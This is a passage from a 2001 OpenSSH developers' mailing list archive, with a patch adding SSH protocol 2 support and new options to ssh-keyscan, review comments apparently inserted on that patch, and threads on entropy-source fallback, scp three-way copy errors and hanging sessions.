files. .Nm provides a minimal interface suitable for use by shell and perl 
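Review bot: in the init_rng() hunk of Dave Dykstra's entropy.c patch earlier in this thread, `if (access(PRNGD_SOCKET, R_OK) == 0)` is the wrong probe for a Unix-domain socket: connect() needs write permission on the socket node, not read, and access() cannot tell whether prngd is actually listening behind it, so a stale socket file left by a dead prngd still selects PRNGD_SOURCE and the later prngd_get_random_bytes() call in seed_rng() fails. Probe with a real connect() (or at least W_OK), and log which source won at the same debug() level the new "Opening entropy socket" messages use, since the fallback to BUILTIN_SOURCE is otherwise invisible to the administrator, which is exactly the silent quality downgrade Ben objects to in his reply above.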
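Review bot: in the new seed_rng() of that same entropy.c patch, `int ret;` is only assigned inside whichever `case` labels are compiled in and the switch has no `default:`, so if seed_source ever holds a value with no compiled case, the `if (!ret)` test under `#if defined(USE_PRNGD) || defined(RANDOM_POOL)` reads an uninitialised variable. init_rng() fatal()s on seed_source == 0, so this is unreachable today, but compilers will warn and a fourth source would trip it. Initialise `int ret = 0;`, add `default: fatal("unknown entropy source %d", seed_source);`, and move `buf` under the same #if, since a USE_BUILTIN_ENTROPY-only build never touches it.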
@@ -47,14 +53,43 @@ have begun after you created your ssh_known_hosts file. .Sh OPTIONS .Bl -tag -width Ds -.It Fl t +.It Fl v +Verbose mode. +Causes +.Nm +to print debugging messages about its progress. +.It Fl 4 +Forces +.Nm +to use IPv4 addresses only. +.It Fl 6 +Forces +.Nm +to use IPv6 addresses only. +.It Fl T Set the timeout for connection attempts. If .Pa timeout seconds have elapsed since a connection was initiated to a host or since the last time anything was read from that host, then the connection is closed and the host in question considered unavailable. Default is 5 seconds. -.It Fl f +.It Fl t Ar type +Specifies the type of the key to fetch from the following hosts. +The possible values are +.Dq rsa1 +for protocol version 1 and +.Dq rsa +or +.Dq dsa +for protocol version 2. +Multiple values may be specified by separating them with commas. +The default is +.Dq rsa1 . +Specifying the +.Pa -t +option again later on the line will change the value for the hostnames that +follow, allowing you to get different key-types from different hosts. +.It Fl f Ar filename Read hosts or .Pa addrlist namelist pairs from this file, one per line. 
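Review bot: `.It Fl T` in this OPTIONS hunk has lost its argument; the synopsis says `.Op Fl T Ar timeout` and the text that follows refers to `.Pa timeout`, so it should read `.It Fl T Ar timeout`, parallel to the `.It Fl t Ar type` and `.It Fl f Ar filename` entries added in the same hunk. While here, `.Pa timeout` and `.Pa -t` mark paths in mdoc; `.Ar timeout` and `.Fl t` are the macros meant.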
@@ -65,40 +100,68 @@ will read hosts or .Pa addrlist namelist pairs from the standard input. +It is legal to specify multiple +.Pa -f +options and to intermingle them with literal hostnames in any order. .El .Sh EXAMPLES .Pp -Print the host key for machine -.Pa hostname : +Print the +.Pa rsa1 +host key for machine +.Pa host1 +and the +.Pa dsa +host key for machine +.Pa host2 : .Bd -literal -ssh-keyscan hostname +ssh-keyscan host1 -t dsa host2 .Ed .Pp Find all hosts from the file .Pa ssh_hosts which have new or different keys from those in the sorted file -.Pa ssh_known_hosts : +.Pa ssh_known_hosts2 : .Bd -literal -$ ssh-keyscan -f ssh_hosts | sort -u - ssh_known_hosts | \e\ - diff ssh_known_hosts - +$ ssh-keyscan -t rsa,dsa -f ssh_hosts | \e\ + sort -u - ssh_known_hosts2 | diff ssh_known_hosts2 - .Ed .Pp .Sh FILES .Pp .Pa Input format: +.Bd -literal 1.2.3.4,1.2.4.4 name.my.domain,name,n.my.domain,n,1.2.3.4,1.2.4.4 +.Ed .Pp -.Pa Output format: +.Pa Output format for rsa1 keys: +.Bd -literal host-or-namelist bits exponent modulus +.Ed +.Pp +.Pa Output format for rsa and dsa keys: +.Bd -literal +host-or-namelist keytype base64-encoded-key +.Ed +.Pp +Where +.Pa keytype +is either +.Dq ssh-rsa +or +.Dq ssh-dsa . .Pp .Pa /etc/ssh_known_hosts .Sh BUGS It generates "Connection closed by remote host" messages on the consoles -of all the machines it scans. +of all the machines it scans if the server is older than version 2.9. This is because it opens a connection to the ssh port, reads the public key, and drops the connection as soon as it gets the key. .Sh SEE ALSO .Xr ssh 1 , .Xr sshd 8 -.Sh AUTHOR +.Sh AUTHORS David Mazieres +wrote the initial version, and +Wayne Davison +added support for ssh protocol 2. Index: ssh-keyscan.c --- ssh-keyscan.c 2001/03/14 18:37:13 1.26 +++ ssh-keyscan.c 2001/06/10 20:58:42 
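Review bot: in the FILES section of this hunk, `.Dq ssh-dsa` is not a key-type identifier that ssh or sshd ever prints or accepts; the ssh-keyscan.c change sets the host-key proposal to `"ssh-dss"` for KT_DSA, and that is the string key_write() puts on the output line, so the text should read `.Dq ssh-dss`. The `-t dsa` option value is fine as is, since that is what the option parser takes; only the documented output format is wrong.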
@@ -19,10 +19,16 @@ #include +#include #include "xmalloc.h" #include "ssh.h" #include "ssh1.h" #include "key.h" +#include "kex.h" +#include "compat.h" +#include "myproposal.h" +#include "packet.h" +#include "dispatch.h" #include "buffer.h" #include "bufaux.h" #include "log.h" @@ -30,7 +36,19 @@ static int argno = 1; /* Number of argument currently being parsed */ -int family = AF_UNSPEC; /* IPv4, IPv6 or both */ +/* Flag indicating whether IPv4 or IPv6. This can be set on the command line. + Default value is AF_UNSPEC means both IPv4 and IPv6. */ +#ifdef IPV4_DEFAULT +int IPv4or6 = AF_INET; +#else +int IPv4or6 = AF_UNSPEC; +#endif + +#define KT_RSA1 1 +#define KT_DSA 2 +#define KT_RSA 4 + +int get_keytypes = KT_RSA1; /* Get only RSA1 keys by default */ #define MAXMAXFD 256 @@ -48,6 +66,8 @@ fd_set *read_wait; size_t read_wait_size; int ncon; +int nonfatal_fatal = 0; +jmp_buf kexjmp; /* * Keep a connection structure for each file descriptor. The state @@ -63,11 +83,13 @@ int c_plen; /* Packet length field for ssh packet */ int c_len; /* Total bytes which must be read. */ int c_off; /* Length of data read so far. */ + int c_keytype; /* Only one of KT_RSA1, KT_DSA, or KT_RSA */ char *c_namebase; /* Address to free for c_name and c_namelist */ char *c_name; /* Hostname of connection for errors */ char *c_namelist; /* Pointer to other possible addresses */ char *c_output_name; /* Hostname of connection for output */ char *c_data; /* Data read from this fd */ + Kex *c_kex; /* The key-exchange struct for ssh2 */ struct timeval c_tv; /* Time at which connection gets aborted */ TAILQ_ENTRY(Connection) c_link; /* List of connections in timeout order. */ } con; @@ -261,8 +283,8 @@ return (tok); } -void -keyprint(char *host, char *output_name, char *kd, int len) +Key * +keygrab_ssh1(con *c) { static Key *rsa; static Buffer msg; 
@@ -271,12 +293,12 @@ buffer_init(&msg); rsa = key_new(KEY_RSA1); } - buffer_append(&msg, kd, len); - buffer_consume(&msg, 8 - (len & 7)); /* padding */ + buffer_append(&msg, c->c_data, c->c_plen); + buffer_consume(&msg, 8 - (c->c_plen & 7)); /* padding */ if (buffer_get_char(&msg) != (int) SSH_SMSG_PUBLIC_KEY) { - error("%s: invalid packet type", host); + error("%s: invalid packet type", c->c_name); buffer_clear(&msg); - return; + return NULL; } buffer_consume(&msg, 8); /* cookie */ @@ -289,10 +311,54 @@ (void) buffer_get_int(&msg); buffer_get_bignum(&msg, rsa->rsa->e); buffer_get_bignum(&msg, rsa->rsa->n); + buffer_clear(&msg); + + return (rsa); +} + +int +hostjump(Key *hostkey) +{ + longjmp(kexjmp, (int)hostkey); +} + +Key * +keygrab_ssh2(con *c) +{ + int j; - fprintf(stdout, "%s ", output_name ? output_name : host); - key_write(rsa, stdout); + packet_set_connection(c->c_fd, c->c_fd); + enable_compat20(); + myproposal[PROPOSAL_SERVER_HOST_KEY_ALGS] = c->c_keytype == KT_DSA? + "ssh-dss": "ssh-rsa"; + c->c_kex = kex_setup(myproposal); + c->c_kex->check_host_key = hostjump; + + if (!(j = setjmp(kexjmp))) { + nonfatal_fatal = 1; + dispatch_run(DISPATCH_BLOCK, &c->c_kex->done, c->c_kex); + fprintf(stderr, "Impossible! dispatch_run() returned!\n"); + exit(1); + } + nonfatal_fatal = 0; + xfree(c->c_kex); + c->c_kex = NULL; + packet_close(); + if (j < 0) + j = 0; + + return (Key*)(j); +} + +void +keyprint(con *c, Key *key) +{ + if (!key) + return; + + fprintf(stdout, "%s ", c->c_output_name ? c->c_output_name : c->c_name); + key_write(key, stdout); fputs("\n", stdout); } @@ -305,7 +371,7 @@ snprintf(strport, sizeof strport, "%d", SSH_DEFAULT_PORT); memset(&hints, 0, sizeof(hints)); - hints.ai_family = family; + hints.ai_family = IPv4or6; hints.ai_socktype = SOCK_STREAM; if ((gaierr = getaddrinfo(host, strport, &hints, &aitop)) != 0) fatal("getaddrinfo %s: %s", host, gai_strerror(gaierr)); 
@@ -330,7 +396,7 @@ } int -conalloc(char *iname, char *oname) +conalloc(char *iname, char *oname, int keytype) { int s; char *namebase, *name, *namelist; @@ -359,6 +425,7 @@ fdcon[s].c_data = (char *) &fdcon[s].c_plen; fdcon[s].c_len = 4; fdcon[s].c_off = 0; + fdcon[s].c_keytype = keytype; gettimeofday(&fdcon[s].c_tv, NULL); fdcon[s].c_tv.tv_sec += timeout; TAILQ_INSERT_TAIL(&tq, &fdcon[s], c_link); @@ -378,6 +445,7 @@ if (fdcon[s].c_status == CS_KEYS) xfree(fdcon[s].c_data); fdcon[s].c_status = CS_UNUSED; + fdcon[s].c_keytype = 0; TAILQ_REMOVE(&tq, &fdcon[s], c_link); FD_CLR(s, read_wait); ncon--; @@ -397,21 +465,16 @@ { int ret; con *c = &fdcon[s]; - char *iname, *oname; - iname = xstrdup(c->c_namelist); - oname = xstrdup(c->c_output_name); + ret = conalloc(c->c_namelist, c->c_output_name, c->c_keytype); confree(s); - ret = conalloc(iname, oname); - xfree(iname); - xfree(oname); return (ret); } void congreet(int s) { - char buf[80], *cp; + char buf[256], *cp; size_t bufsiz; int n = 0; con *c = &fdcon[s]; @@ -433,12 +496,27 @@ } *cp = '\0'; fprintf(stderr, "# %s %s\n", c->c_name, buf); - n = snprintf(buf, sizeof buf, "SSH-1.5-OpenSSH-keyscan\r\n"); + if (c->c_keytype != KT_RSA1) { + char remote_version[sizeof buf]; + + if (sscanf(buf, "SSH-%*d.%*d-%[^\n]\n", remote_version) == 1) + compat_datafellows(remote_version); + else + datafellows = 0; + } + n = snprintf(buf, sizeof buf, "SSH-%d.%d-OpenSSH-keyscan\r\n", + c->c_keytype == KT_RSA1? PROTOCOL_MAJOR_1 : PROTOCOL_MAJOR_2, + c->c_keytype == KT_RSA1? PROTOCOL_MINOR_1 : PROTOCOL_MINOR_2); if (atomicio(write, s, buf, n) != n) { error("write (%s): %s", c->c_name, strerror(errno)); confree(s); return; } + if (c->c_keytype != KT_RSA1) { + keyprint(c, keygrab_ssh2(c)); + confree(s); + return; + } c->c_status = CS_SIZE; contouch(s); } @@ -471,7 +549,7 @@ c->c_status = CS_KEYS; break; case CS_KEYS: - keyprint(c->c_name, c->c_output_name, c->c_data, c->c_plen); + keyprint(c, keygrab_ssh1(c)); confree(s); return; break; 
@@ -539,49 +617,99 @@ nexthost(int argc, char **argv) { static Linebuf *lb; + char *fname, *tname; for (;;) { - if (!lb) { - if (argno >= argc) - return (NULL); - if (argv[argno][0] != '-') - return (argv[argno++]); - if (!strcmp(argv[argno], "--")) { + if (lb) { + char *line; + + line = Linebuf_getline(lb); + if (line) + return (line); + Linebuf_free(lb); + lb = NULL; + } + if (argno >= argc) + return (NULL); + if (argv[argno][0] != '-') + return (argv[argno++]); + while (*++(argv[argno])) { + switch (argv[argno][0]) { + case '-': if (++argno >= argc) return (NULL); return (argv[argno++]); - } else if (!strncmp(argv[argno], "-f", 2)) { - char *fname; - - if (argv[argno][2]) - fname = &argv[argno++][2]; + case 'f': + if (argv[argno][1]) + fname = &argv[argno][1]; else if (++argno >= argc) { error("missing filename for `-f'"); return (NULL); } else - fname = argv[argno++]; + fname = argv[argno]; if (!strcmp(fname, "-")) fname = NULL; lb = Linebuf_alloc(fname, error); - } else + goto double_break; + case 't': + get_keytypes = 0; + tname = &argv[argno][1]; + if (!*tname) { + if (++argno >= argc) { + error("missing types for `-t'"); + return (NULL); + } + tname = argv[argno]; + } + tname = strtok(tname, ","); + while (tname) { + int type = key_type_from_name(tname); + switch (type) { + case KEY_RSA1: + get_keytypes |= KT_RSA1; + break; + case KEY_DSA: + get_keytypes |= KT_DSA; + break; + case KEY_RSA: + get_keytypes |= KT_RSA; + break; + case KEY_UNSPEC: + fatal("unknown key type %s\n", + tname); + } + tname = strtok(NULL, ","); + } + goto double_break; + case '4': + IPv4or6 = AF_INET; + break; + case '6': + IPv4or6 = AF_INET6; + break; + default: error("ignoring invalid/misplaced option `%s'", - argv[argno++]); - } else { - char *line; - - line = Linebuf_getline(lb); - if (line) - return (line); - Linebuf_free(lb); - lb = NULL; + argv[argno]); + goto double_break; + } } +double_break: + argno++; } } void +fatal_callback(void *arg) +{ + if (nonfatal_fatal) + 
longjmp(kexjmp, -1); +} + +void usage(void) { - fatal("usage: %s [-t timeout] { [--] host | -f file } ...", __progname); + fatal("usage: %s [-v46] [-T timeout] { [-t type] [--] host | -f file } ...", + __progname); return; } @@ -589,6 +717,7 @@ main(int argc, char **argv) { char *host = NULL; + int debug_flag = 0, log_level = SYSLOG_LEVEL_INFO; __progname = get_progname(argv[0]); TAILQ_INIT(&tq); @@ -596,21 +725,46 @@ if (argc <= argno) usage(); - if (argv[1][0] == '-' && argv[1][1] == 't') { - argno++; - if (argv[1][2]) - timeout = atoi(&argv[1][2]); - else { - if (argno >= argc) - usage(); - timeout = atoi(argv[argno++]); + while (argv[argno][0] == '-') { + while (*++(argv[argno])) { + switch (argv[argno][0]) { + case 'T': + if (argv[argno][1]) + timeout = atoi(&argv[argno][1]); + else { + if (++argno >= argc) + usage(); + timeout = atoi(argv[argno]); + } + if (timeout <= 0) + usage(); + goto double_break; + case 'v': + if (!debug_flag) { + debug_flag = 1; + log_level = SYSLOG_LEVEL_DEBUG1; + } + else if (log_level < SYSLOG_LEVEL_DEBUG3) + log_level++; + else + fatal("Too high debugging level."); + break; + default: + if (*--(argv[argno]) != '-') + fatal("Please separate options T and v from any other options."); + goto triple_break; + } } - if (timeout <= 0) - usage(); +double_break: + argno++; } +triple_break: if (argc <= argno) usage(); + log_init("ssh-keyscan", log_level, SYSLOG_FACILITY_USER, 1); + fatal_add_cleanup(fatal_callback, NULL); + maxfd = fdlim_get(1); if (maxfd < 0) fatal("%s: fdlim_get: bad value", __progname); @@ -623,6 +777,9 @@ fdcon = xmalloc(maxfd * sizeof(con)); memset(fdcon, 0, maxfd * sizeof(con)); + init_rng(); + seed_rng(); + read_wait_size = howmany(maxfd, NFDBITS) * sizeof(fd_mask); read_wait = xmalloc(read_wait_size); memset(read_wait, 0, read_wait_size); 
@@ -630,12 +787,16 @@ do { while (ncon < MAXCON) { char *name; + int j; host = nexthost(argc, argv); if (host == NULL) break; name = strnnsep(&host, " \t\n"); - conalloc(name, *host ? host : name); + for (j = KT_RSA1; j <= KT_RSA; j *= 2) { + if (get_keytypes & j) + conalloc(name, *host ? host : name, j); + } } conloop(); } while (host); From mstone at cs.loyola.edu Mon Jun 11 12:41:14 2001 From: mstone at cs.loyola.edu (Michael Stone) Date: Sun, 10 Jun 2001 22:41:14 -0400 Subject: Patch to enable multiple possible sources of entropy In-Reply-To: ; from mouring@etoh.eviladmin.org on Sun, Jun 10, 2001 at 12:49:18PM -0500 References: <20010607125014.A15157@lucent.com> Message-ID: <20010610224114.C15731@justice.loyola.edu> On Sun, Jun 10, 2001 at 12:49:18PM -0500, mouring at etoh.eviladmin.org wrote: > Hmm.. my only complaints about the patch is that seed_rng and init_rng are > pretty unreadable due to #ifdef/#end, and that I don't know if I like the > idea of ssh/sshd stepping down in entropy quality on a whim. Which is > what this patch would do if for some odd reason prngd is offline at > startup of sshd/ssh. What if there were some kind of warning message? We've already seen the obnoxious key-is-1023 message, what's one more? Obviously the entropy requirement depends on the application, but there are a lot of machines where I'm far more concerned about not getting in at all (because prngd is busted) than I am about bad entropy in that case. It's no worse than if prngd weren't being used at all, and might make it easier to accept prngd. -- Mike Stone From dwd at bell-labs.com Tue Jun 12 00:19:47 2001 
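Review bot: the "Output format for rsa and dsa keys" paragraph in the ssh-keyscan.1 hunk says keytype is either `ssh-rsa` or `ssh-dsa`, but keygrab_ssh2() in this same patch requests `"ssh-dss"` as the server host key algorithm, and that is the name the output column will carry; change `.Dq ssh-dsa` to `.Dq ssh-dss`. The `host1 -t dsa host2` example also relies on `-t` resetting get_keytypes and applying only to hosts listed after it, which the -t option text should state explicitly.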
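Review bot: `jmp_buf kexjmp` and `int nonfatal_fatal` in the `@@ -48,6 +66,8 @@` hunk are file-scope state shared by every connection, so only one protocol 2 key exchange can be in flight at a time; that matches the blocking dispatch_run() call later in the patch but deserves a comment at the declaration. The `#include` added at the top of the file shows no header name in this archive copy; it should be the setjmp header, which these declarations need.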
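Review bot: hostjump() pushes the Key pointer through longjmp() as an int and keygrab_ssh2() recovers it with `return (Key*)(j)`; on platforms where pointers are wider than int the cast truncates the pointer and the reconstructed value is garbage, and longjmp() substitutes 1 for a 0 argument, so the value is also ambiguous. Stash the Key* in a file-scope variable (or on the con) and longjmp with a small status such as 1, keeping -1 for fatal_callback(). hostjump() is also declared `int` but never returns a value; add `/* NOTREACHED */` and a `return 0;` after the longjmp() to keep compilers quiet.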
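Review bot: in the conrecycle() hunk the order conalloc() then confree() is essential, since confree() frees c_namebase and c->c_namelist / c->c_output_name point into it (see the c_namebase comment in the struct hunk); conalloc() must copy its arguments before that happens. A one-line comment would stop a future reordering from reintroducing the use-after-free the old xstrdup() dance avoided.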
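Review bot: in the congreet() hunk the protocol 2 path calls keygrab_ssh2(), which runs the whole key exchange synchronously via `dispatch_run(DISPATCH_BLOCK, ...)` on the packet layer's single connection. While it runs, conloop()'s select() and the per-connection c_tv timeouts are not serviced, so one server that sends a banner and then stalls blocks every other pending host, and the -T timeout effectively covers only the banner read for ssh2 hosts; note that in the man page or guard the exchange with an alarm. Also, keygrab_ssh2() calls packet_close() before congreet() calls confree(s): if packet_close() closes the descriptor handed to packet_set_connection(c->c_fd, c->c_fd), confree() will close it a second time, which can hit a number already reused by another connection.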
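Review bot: in the nexthost() hunk the `default:` branch reports `argv[argno]` after the `while (*++(argv[argno]))` loop has advanced the pointer, so the message shows only the tail of the argument (`x` for `-x`, or `x` after a valid `-4x`); save the original argv[argno] before the loop for the diagnostic. Minor: `fatal("unknown key type %s\n", tname)` carries a trailing newline that the other fatal() calls in this patch omit, and strtok() on the -t argument modifies argv in place, which is fine here but worth a comment.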
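Review bot: usage() now advertises `[-v46]` as one group, but main()'s parser handles only T and v and dies with "Please separate options T and v from any other options." when it meets any other letter after them in the same argument, so `-v4` is fatal while `-v -4` works. Either add `case '4'`/`case '6'` to main()'s switch (setting IPv4or6 as nexthost() does) or print the usage as `[-v] [-4|-6]`. The `*--(argv[argno])` test also rewinds argv[argno] permanently; that is what lets nexthost() re-parse a leading -4/-6, but a comment would help the next reader.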
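Review bot: `for (j = KT_RSA1; j <= KT_RSA; j *= 2)` in the main() loop silently depends on KT_RSA1, KT_DSA and KT_RSA being consecutive powers of two; a comment next to the #defines, or iterating an explicit table of the three constants, would keep a later fourth type from being skipped. Each requested key type also opens a separate connection to the host, which multiplies the "Connection closed by remote host" noise the BUGS section describes for pre-2.9 servers.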
From: dwd at bell-labs.com (Dave Dykstra) Date: Mon, 11 Jun 2001 09:19:47 -0500 Subject: Patch to enable multiple possible sources of entropy In-Reply-To: <20010610224114.C15731@justice.loyola.edu>; from mstone@cs.loyola.edu on Sun, Jun 10, 2001 at 10:41:14PM -0400 References: <20010607125014.A15157@lucent.com> <20010610224114.C15731@justice.loyola.edu> Message-ID: <20010611091947.A4269@lucent.com> On Sun, Jun 10, 2001 at 10:41:14PM -0400, Michael Stone wrote: > On Sun, Jun 10, 2001 at 12:49:18PM -0500, mouring at etoh.eviladmin.org wrote: > > Hmm.. my only complaints about the patch is that seed_rng and init_rng are > > pretty unreadable due to #ifdef/#end I could make it a lot more readable by having it always do access() to probe for RANDOM_POOL and PRNGD_SOCKET even if one of them is the only choice. I initially elected to trade off exact compatibility for readability, but I'd be happy to change it. I've included the more readable init_rng() below for you to take a look at. The difference is that even if only one of RANDOM_POOL or PRNGD_SOCKET is compiled in, if it isn't there the error message will be the more generic Couldn't find source for random number generator seed rather than a message about the problem accessing the specific source. I put in some debug level 2 messages to help debugging that case (those are good even if you choose to keep the extra ifdefs), and I slightly improved the fatal error message. Also, the ifdefs for PRNGD_SOCKET and USE_BUILTIN_ENTROPY do not really need to be in the else case of PRNGD_PORT because configure enforces that already, but I think it's more understandable this way. > > and that I don't know if I like the > > idea of ssh/sshd stepping down in entropy quality on a whim. Which is > > what this patch would do if for some odd reason prngd is offline at > > startup of sshd/ssh. > > What if there were some kind of warning message? We've already seen the > obnoxious key-is-1023 message, what's one more?
I don't mind a debug message but I really would not want a warning message because that's going to be the normal case on a lot of my systems. My answer is that most likely even if prngd is offline, the PRNGD_SOCKET will still exist even though there's no process listening on the other side. In that case, ssh will go ahead into the prngd_get_random_bytes case but get a Connection Refused error (this happened during my testing). Another idea would be to improve the fatal error message by saving some information when the access() calls fail rather than just printing debug messages. For example, there could be a variable that points to the error message to use if it gets to the fatal condition at the end. Do you like that better? I don't think that complication is necessary. > Obviously the entropy > requirement depends on the application, but there are a lot of machines > where I'm far more concerned about not getting in at all (because prngd > is busted) than I am about bad entropy in that case. It's no worse than > if prngd weren't being used at all, and might make it easier to accept > prngd. Good point. 
- Dave Dykstra

------ more readable init_rng() follows ------------------------

void
init_rng(void)
{
	check_openssl_version();

#ifdef RANDOM_POOL
	if (access(RANDOM_POOL, F_OK) == 0) {
		seed_source = POOL_SOURCE;
		return;
	} else {
		debug2("Random pool %s does not exist", RANDOM_POOL);
	}
#endif /* RANDOM_POOL */

	/* it's not trivial to probe for an open port so just make it
	 * take priority over the other sources if it is defined */
#ifdef PRNGD_PORT
	seed_source = PRNGD_SOURCE;
#else
#ifdef PRNGD_SOCKET
	if (access(PRNGD_SOCKET, F_OK) == 0) {
		seed_source = PRNGD_SOURCE;
		return;
	} else {
		debug2("Entropy socket %s does not exist", PRNGD_SOCKET);
	}
#endif /* PRNGD_SOCKET */
#ifdef USE_BUILTIN_ENTROPY
	seed_source = BUILTIN_SOURCE;
	prng_init_rng();
#endif
#endif /* PRNGD_PORT */

	if (seed_source == 0)
		fatal("Couldn't find entropy source for random number generator");
}

From dveeravalli at telica.com Tue Jun 12 01:07:51 2001 From: dveeravalli at telica.com (Deepa Nemmili Veeravalli) Date: Mon, 11 Jun 2001 11:07:51 -0400 Subject: scp error ! Message-ID: <7AC90049E901D511A8CA009027289AEA8EBDB4@wench> I get the following error when trying to execute scp -v dveerava at keg:perl5.tar.gz root at boris:scptest error: .... Executing: program /usr/bin/ssh host boris, user root, command scp -v -t scptest You have no controlling tty. Cannot read passphrase. .... Can someone help me... Txs,Deepa. From Markus.Friedl at informatik.uni-erlangen.de Tue Jun 12 01:22:58 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 11 Jun 2001 17:22:58 +0200 Subject: scp error ! In-Reply-To: <7AC90049E901D511A8CA009027289AEA8EBDB4@wench>; from dveeravalli@telica.com on Mon, Jun 11, 2001 at 11:07:51AM -0400 References: <7AC90049E901D511A8CA009027289AEA8EBDB4@wench> Message-ID: <20010611172258.A18735@faui02.informatik.uni-erlangen.de> 3-way copy only works if pubkey or hostbased authentication is allowed from 'keg' to 'boris'. -m On Mon, Jun 11, 2001 at 11:07:51AM -0400, Deepa Nemmili Veeravalli wrote: > I get the following error when trying to execute > > scp -v dveerava at keg:perl5.tar.gz root at boris:scptest > > error: > .... > Executing: program /usr/bin/ssh host boris, user root, command scp -v -t > scptest > You have no controlling tty. Cannot read passphrase. > .... > > > Can someone help me... > > Txs,Deepa. From Markus.Friedl at informatik.uni-erlangen.de Tue Jun 12 01:38:01 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 11 Jun 2001 17:38:01 +0200 Subject: Hanging SSH1 client (fwd) Message-ID: <20010611173801.A20893@faui02.informatik.uni-erlangen.de> installing openssh on irix is hard? -------------- next part -------------- An embedded message was scrubbed... From: Miguel Jardine Subject: Re: Hanging SSH1 client Date: Mon, 11 Jun 2001 11:09:38 -0700 Size: 4832 Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010611/c665c85d/attachment.mht From pekkas at netcore.fi Tue Jun 12 03:35:36 2001 
From: pekkas at netcore.fi (Pekka Savola) Date: Mon, 11 Jun 2001 20:35:36 +0300 (EEST) Subject: Hanging SSH1 client (fwd) In-Reply-To: <20010611173801.A20893@faui02.informatik.uni-erlangen.de> Message-ID: On Mon, 11 Jun 2001, Markus Friedl wrote: > installing openssh on irix is hard? Not in itself, but Irix doesn't have stuff like new zlib, tcp_wrappers, openssl, /dev/*random etc. there by default, and installing the prerequisites can be a bit troublesome (and ssh.com ssh includes these in itself). -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From wendyp at cray.com Tue Jun 12 05:04:46 2001 From: wendyp at cray.com (Wendy Palm) Date: Mon, 11 Jun 2001 14:04:46 -0500 Subject: Defect: OpenSSH hangs on logout References: <20010607092831.D24958@eeg.ccf.org> <20010608082225.F24958@eeg.ccf.org> <3B20D131.5C6BFDA@mail.microcenter.com> Message-ID: <3B25164E.A6460C92@cray.com> Aaron Bush wrote: > > > The real danger that i have come across is when doing a scp a defunct > process will show up after the copy is complete. > Basically you end up with a scp that never returns which is very bad. > > -ab that's the problem i'm having now. did you determine that signals were your problem? -- wendy palm Cray OS Sustaining Engineering, Cray Inc. wendyp at cray.com, 651-605-9154 From abush at microcenter.com Tue Jun 12 05:32:08 2001
From: abush at microcenter.com (Aaron Bush) Date: Mon, 11 Jun 2001 15:32:08 -0400 Subject: Defect: OpenSSH hangs on logout References: <20010607092831.D24958@eeg.ccf.org> <20010608082225.F24958@eeg.ccf.org> <3B20D131.5C6BFDA@mail.microcenter.com> <3B25164E.A6460C92@cray.com> Message-ID: <3B251CB8.C455C387@mail.microcenter.com> Wendy Palm wrote: > > Aaron Bush wrote: > > > > > > The real danger that i have come across is when doing a scp a defunct > > process will show up after the copy is complete. > > Basically you end up with a scp that never returns which is very bad. > > > > -ab > > that's the problem i'm having now. did you determine that signals were > your problem? > > -- > wendy palm > Cray OS Sustaining Engineering, Cray Inc. > wendyp at cray.com, 651-605-9154 I have replaced all of my HPUX sshd's with versions that do not SA_RESTART and have not had the problem again. However, the problem with a hung scp was _very_ intermittent and would sometimes take several days to appear. Whereas the interactive ssh sessions always required an extra keystroke to close the connection and now since the removal of SA_RESTART that problem has gone away 100%. If i have a scp process that hangs again with the new sshd i will update you. Thanks, -ab From mouring at etoh.eviladmin.org Tue Jun 12 09:11:44 2001 
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Mon, 11 Jun 2001 18:11:44 -0500 (CDT) Subject: scp error ! In-Reply-To: <7AC90049E901D511A8CA009027289AEA8EBDB4@wench> Message-ID: That is a known issue. It's currently not supported. - Ben On Mon, 11 Jun 2001, Deepa Nemmili Veeravalli wrote: > I get the following error when trying to execute > > scp -v dveerava at keg:perl5.tar.gz root at boris:scptest > > error: > .... > Executing: program /usr/bin/ssh host boris, user root, command scp -v -t > scptest > You have no controlling tty. Cannot read passphrase. > .... > > > Can someone help me... > > Txs,Deepa. > From djm at mindrot.org Tue Jun 12 11:12:55 2001 From: djm at mindrot.org (Damien Miller) Date: Tue, 12 Jun 2001 11:12:55 +1000 (EST) Subject: scp error ! In-Reply-To: Message-ID: On Mon, 11 Jun 2001 mouring at etoh.eviladmin.org wrote: To clarify: you need to be able to authenticate yourself to 'boris' from 'keg' without a passphrase (e.g. use pubkey auth and agent forwarding). -d > That is a known issue. It's currently not supported. > > - Ben > > On Mon, 11 Jun 2001, Deepa Nemmili Veeravalli wrote: > > > I get the following error when trying to execute > > > > scp -v dveerava at keg:perl5.tar.gz root at boris:scptest > > > > error: > > .... > > Executing: program /usr/bin/ssh host boris, user root, command scp -v -t > > scptest > > You have no controlling tty. Cannot read passphrase. > > .... > > > > > > Can someone help me... > > > > Txs,Deepa. > > > -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From rachit at ensim.com Tue Jun 12 11:19:32 2001
From: rachit at ensim.com (Rachit Siamwalla) Date: Mon, 11 Jun 2001 18:19:32 -0700 Subject: yet another ssh hanging issue. Message-ID: <9AC41B8C4781464695BB013F106FCA31D2BE21@nasdaq.ms.ensim.com> This problem does not fit into the normal sleep 20 &; exit hanging problem. Basically, we use ssh as a secure RPC mechanism to install / update RPMs remotely. The problem is ssh "hangs" after installing an RPM "sometimes". And, no, that RPM does not start any daemons or hold onto any fds / ttys. Attached is various lsof / strace / ps / etc. information on the server after the "hanging" took place. We didn't attach the same for the client, although we did look, and the client seemed to be selecting on the "normal" fds, and waiting for the server to exit. (it was an ssh myhost rpm -U command) We couldn't get -v / -d output because this problem happens relatively rarely. No zombie processes. One thing that confuses us is fd #5. It is a unix socket but doesn't seem to look like a connection to /dev/log. ssh doesn't seem to connect to any other unix socket except for /dev/log, but then releases the connection right away. We will attempt to reproduce it and narrow down the possible reasons and hopefully eventually get -v / -d output, but hope this email helps. Also if someone knows whether anything significant changed in 2.9 that would likely fix these issues, that would be cool. Otherwise I'd like to postpone upgrading to 2.9, because it is an extreme pain to upgrade everyone's machine to 2.9 remotely, especially if I'm not sure if that's going to fix it (I'll never know until weeks afterward). Let me know if there are any questions. And thank you *very* much for a great package. It is making my job so much easier. ----------------- Environment info. Client: generic openssh 2.5.2p2 compiled without patches and statically linked to OpenSSL. Linux i386 Server: redhat 7.1 default openssh 2.5.2p2-5.
